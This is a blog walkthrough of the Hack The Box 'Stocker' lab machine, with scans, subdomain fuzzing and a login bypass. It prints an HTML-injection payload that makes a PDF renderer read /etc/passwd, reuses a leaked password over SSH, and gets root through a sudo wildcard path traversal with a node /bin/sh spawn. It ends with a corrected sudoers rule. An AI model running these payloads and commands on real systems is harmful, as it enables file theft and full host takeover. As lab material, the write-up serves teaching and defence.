Stocker machine

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.196
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:34 EDT
Warning: 10.10.11.196 giving up on port because retransmission cap hit (10).
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.037s latency).
Not shown: 64550 closed tcp ports (reset), 983 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 30.17 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,80 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:36 EDT
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.0044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Stock - Coming Soon!
|_http-generator: Eleventy v2.0.0
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds
┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:37 EDT
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.0036s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 76.35 seconds

What we learned: only ports 22 and 80 are open, the host is Ubuntu (OpenSSH 8.2p1 Ubuntu build, nginx 1.18.0 Ubuntu build), and the scans show no real vulnerability. The http-vuln-cve2011-3192 hit (Apache byterange DoS) should be treated as a false positive: the server identifies itself as nginx, and that NSE check is known to misfire on non-Apache servers. Note also that port 80 redirects to the stocker.htb virtual host, which is why nmap reports that name and why the site only loads properly after adding it to /etc/hosts (one IP can serve several names, and the server picks the site from the Host header).

Web exploitation

Site reconnaissance

Next I tried directory brute forcing, reading the page source, looking at the certificate and inspecting the cookies; this page does not seem to offer anything usable.

Subdomain brute force

That leaves subdomains (I hesitated here and only confirmed it after reading a walkthrough).

┌──(i3eg1nner㉿minilite)-[~]
└─$ wfuzz --hc 301 -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "HOST: FUZZ.stocker.htb" http://stocker.htb/
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://stocker.htb/
Total requests: 4989

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000019: 302 0 L 4 W 28 Ch "dev - dev"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

wfuzz is more convenient than I expected; worth spending some time on its usage tips. The --hc 301 filter hides the 301 that every unknown Host name gets, so the only line left is the name that behaves differently: dev answers 302. That gives the subdomain prefix dev. Add dev.stocker.htb to /etc/hosts as well, and visiting it gives a login page.

Node injection

The login page has no obvious foothold, and SQL injection attempts seemed ineffective; at this point I had no lead.

With some information about the site's stack in hand, I searched around.

There does seem to be something exploitable: a JSON body appears to be parsed, but I could not use it directly, so I kept searching.

Going through the results from top to bottom, nothing usable...

This GitHub project implements a deliberately vulnerable Node.js web app and describes an injection attack.

Trying it, it works.

So modify the request and forward the traffic.

This gives the following page.

It looks like a shop; add something to the cart and place the order.

The link leads to a PDF.

Capture the request with Burp and try modifying some fields.

Incidentally, since the fields can be modified like this, you could order for free (not that I did).

Skia/PDF vulnerability

At this point I was stuck again. I tested for local file inclusion with no result; for code execution, the field is only ever used as a string, so as expected nothing happened. A look at the walkthrough suggested downloading the PDF and inspecting its metadata.

┌──(kali㉿kali)-[~/Downloads]
└─$ exiftool document.pdf
ExifTool Version Number : 12.57
File Name : document.pdf
Directory : .
File Size : 42 kB
File Modification Date/Time : 2023:06:07 22:47:24-04:00
File Access Date/Time : 2023:06:07 22:48:00-04:00
File Inode Change Date/Time : 2023:06:07 22:47:41-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Tagged PDF : Yes
Creator : Chromium
Producer : Skia/PDF m108
Create Date : 2023:06:08 02:43:35+00:00
Modify Date : 2023:06:08 02:43:35+00:00

┌──(kali㉿kali)-[~/Downloads]
└─$ binwalk document.pdf

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PDF document, version: "1.4"
390 0x186 Zlib compressed data, default compression
10980 0x2AE4 Zlib compressed data, default compression
26950 0x6946 Zlib compressed data, default compression
27517 0x6B7D Zlib compressed data, default compression
39333 0x99A5 Zlib compressed data, default compression

The field to note is Producer: Skia/PDF together with Creator Chromium means the PDF is rendered from HTML by a headless Chromium. If our input lands in that HTML unescaped, the browser will embed local files or fetch internal URLs for us, so search for how this has been exploited.

Build a payload: "title":"<iframe src=file:///etc/passwd width=800 height=1050 > ". The width and height have to be tuned by trial: too tall and nothing renders, too short and the file is cut off.

The rendered /etc/passwd shows that the angoose user has a bash login shell.

Reading configuration files

Trying to read /etc/shadow fails, as expected, so the next best thing is configuration files. Searching shows nginx keeps its configuration at /etc/nginx/nginx.conf.

That only reveals the site's location on disk, so I tried to provoke an error message instead.

Reading the file at that path gives nothing useful. Back to the walkthrough: the target file is /var/www/dev/index.js.

It contains a telling string: the dev user's password, dev:IHeardPassphrasesArePrettySecure. Passwords get reused, so check whether it also works over SSH for the human user found in /etc/passwd, angoose.

┌──(i3eg1nner㉿minilite)-[~]
└─$ ssh angoose@10.10.11.196
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password:
Last login: Wed Jun 7 12:32:14 2023 from 10.10.16.30
angoose@stocker:~$ pwd
/home/angoose
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > /usr/local/scripts/shell.js
-bash: /usr/local/scripts/shell.js: Permission denied
angoose@stocker:~$ ls -liah /usr/local/scripts/
total 32K
64592 drwxr-xr-x 3 root root 4.0K Dec 6 2022 .
56194 drwxr-xr-x 11 root root 4.0K Dec 6 2022 ..
64593 -rwxr-x--x 1 root root 245 Dec 6 2022 creds.js
64594 -rwxr-x--x 1 root root 1.6K Dec 6 2022 findAllOrders.js
64595 -rwxr-x--x 1 root root 793 Dec 6 2022 findUnshippedOrders.js
64598 drwxr-xr-x 2 root root 4.0K Dec 6 2022 node_modules
64596 -rwxr-x--x 1 root root 1.4K Dec 6 2022 profitThisMonth.js
64597 -rwxr-x--x 1 root root 623 Dec 6 2022 schema.js
angoose@stocker:~$ touch shell.js
angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > /usr/local/scripts/shell.js
-bash: /usr/local/scripts/shell.js: Permission denied

Privilege escalation via node

This escalation is straightforward: sudo -l gives the clue, angoose may run node as root on any .js file under /usr/local/scripts/. Writing a file into that directory fails because it is root-owned and not writable, but the wildcard is matched against the argument as a plain pattern, so a ../ sequence inside the argument should get around it. (The echo attempts above also failed for a second reason: the inner double quotes ended the shell string, so the quotes were stripped from what was written. That is the SyntaxError seen first below; single-quoting the echo argument fixes it.)

angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > shell.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/shell.js
/home/angoose/shell.js:1
require(child_process).spawn(/bin/sh, {stdio: [0, 1, 2]})
^

SyntaxError: Invalid regular expression flags
at Object.compileFunction (node:vm:360:18)
at wrapSafe (node:internal/modules/cjs/loader:1088:15)
at Module._compile (node:internal/modules/cjs/loader:1123:27)
at Module._extensions..js (node:internal/modules/cjs/loader:1213:10)
at Module.load (node:internal/modules/cjs/loader:1037:32)
at Module._load (node:internal/modules/cjs/loader:878:12)
at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:81:12)
at node:internal/main/run_main_module:23:47

Node.js v18.12.1
angoose@stocker:~$ whoami
angoose
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})' > shell.js
angoose@stocker:~$ cat shell.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/shell.js
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt
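The sudoers rule that makes this work, beside a form that closes the hole. This is an added fragment written for this page, not the machine's actual /etc/sudoers: the weak line is reconstructed from the sudo -l output above, the script names come from the ls listing, and the explicit-list replacement is a suggestion.

```sudoers
# Weak rule, as reported by `sudo -l` on the box. sudo matches command
# arguments against the pattern with fnmatch(3) semantics in which '*'
# also matches '/', so the argument
#   /usr/local/scripts/../../../../home/angoose/shell.js
# satisfies /usr/local/scripts/*.js while resolving to a file angoose owns.
angoose ALL=(ALL) /usr/bin/node /usr/local/scripts/*.js

# Corrected: name each script. No wildcard means no traversal, and adding a
# script becomes an explicit policy change instead of something a glob picks
# up. The scripts themselves must stay root-owned and non-writable by
# angoose, as they already are on the box.
angoose ALL=(ALL) /usr/bin/node /usr/local/scripts/creds.js, \
                  /usr/bin/node /usr/local/scripts/findAllOrders.js, \
                  /usr/bin/node /usr/local/scripts/findUnshippedOrders.js, \
                  /usr/bin/node /usr/local/scripts/profitThisMonth.js, \
                  /usr/bin/node /usr/local/scripts/schema.js
```

Check a rule like this with visudo -c before installing it, and re-run sudo -l as the user to confirm that the traversal argument is now refused.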

Source: https://i3eg1nner.github.io/2023/06/9690503462f3.html
Author: I3eg1nner
Published: 2023-06-08